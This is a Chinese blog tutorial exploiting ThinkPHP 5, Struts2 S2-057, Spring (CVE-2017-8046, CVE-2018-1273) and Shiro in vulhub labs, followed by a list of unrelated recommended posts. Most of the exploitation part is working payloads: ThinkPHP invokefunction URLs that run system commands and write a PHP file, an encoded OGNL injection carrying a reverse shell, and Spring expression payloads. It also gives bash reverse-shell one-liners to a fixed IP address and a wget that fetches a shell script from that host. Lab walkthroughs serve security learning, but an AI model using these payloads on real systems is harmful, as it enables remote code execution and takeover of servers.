常见的框架漏洞(Thinkphp,spring,Shiro)

Thinkphp(TP)

thinkphp5x远程命令执行及getshell

rce比较出名

靶场: vulhub/thinkphp/5-rce

启动环境:

复制代码
docker-compose up -d

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通 过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。

网站url后面直接加,远程执行whoami命令

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

远程执行phpinfo代码

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

根目录生成1.php文件,输出phpinfo

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

struts2

Struts 2 在2007年7月23日发布的第⼀个Struts 2漏洞S2-001

S2-057远程执行代码漏洞

靶场: vulhub 靶场 /struts2/s2-057

url后面加下面代码,发现123+123执行了在url那里

复制代码
/struts2-showcase/${(123+123)}/actionChain1.action

然后我们就可以构造一个反弹shell的语句

复制代码
bash -i >& /dev/tcp/101.201.29.59/8888 0>&1

将它base64编码一下

复制代码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAxLjI5LjU5Lzg4ODggMD4mMQ==

然后构造出下面语句,将上面构造的编码放到echo后面

复制代码
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAxLjI5LjU5Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

将它进行url编码

复制代码
%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMDEuMjAxLjI5LjU5Lzg4ODggMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D

然后进行抓包,将抓的包右击改成post请求然后再改三处地方,如下

放行后监听的地方,即可反弹到shell

spring框架特征

vulhub靶场 /spring/CVE-2017-8046

复制代码
[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value":"vulhub" }]

spring 代码执行(CVE-2018-1273)

打开靶场

复制代码
/users

输入信息抓包

复制代码
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/crz")]=&password=&repeatedPassword=

反弹shell

写一个shell.sh放在服务器下

复制代码
bash -i >& /dev/tcp/101.201.29.59/6666 0>&1

然后开启一个6666端口监听

复制代码
nc -lvvp 6666

然后用python开启一个简单的http服务

复制代码
python3 -m http.server 81

让网站去下载我们的shell.sh

复制代码
wget -qO /tmp/shell.sh http://101.201.29.59:81/shell.sh

然后进入容器终端

复制代码
docker exec -it 容器名 /bin/bash

先查看一下我们刚才上传的文件在吗,然后/bin/bash执行文件

返回监听,就可以反弹到shell了

Shiro

vulhub 靶场 /shiro/CVE-2016-4437

使用BurpSuite进行抓包,在请求包中的cookie字段中添加 rememberMe=123;,看响应包 header中是否返回 rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架:

使用工具

然后反弹shell即可

相关推荐
小王不爱笑13218 分钟前
Java 核心知识点查漏补缺(一)
java·开发语言·python
空空kkk22 分钟前
Java——类和对象
java·开发语言
JIngJaneIL44 分钟前
篮球论坛|基于SprinBoot+vue的篮球论坛系统(源码+数据库+文档)
java·前端·数据库·vue.js·论文·毕设·篮球论坛系统
毕设源码-赖学姐1 小时前
【开题答辩全过程】以 安卓的服装销售APP为例,包含答辩的问题和答案
java·eclipse·tomcat
青云交2 小时前
Java 大视界 -- Java 大数据在智能农业温室环境调控与作物生长模型构建中的应用
java·机器学习·传感器技术·数据处理·作物生长模型·智能农业·温室环境调控
曾经的三心草2 小时前
SpringAI5-智能聊天机器⼈
java·springai
微露清风2 小时前
系统性学习C++-第八讲-vector类
java·c++·学习
roykingw3 小时前
【思想比实现更重要】高并发场景下如何保证接口幂等性
java·web安全·面试
紫荆鱼3 小时前
设计模式-命令模式(Command)
c++·后端·设计模式·命令模式
864记忆3 小时前
Spring Boot 项目标准目录结构
java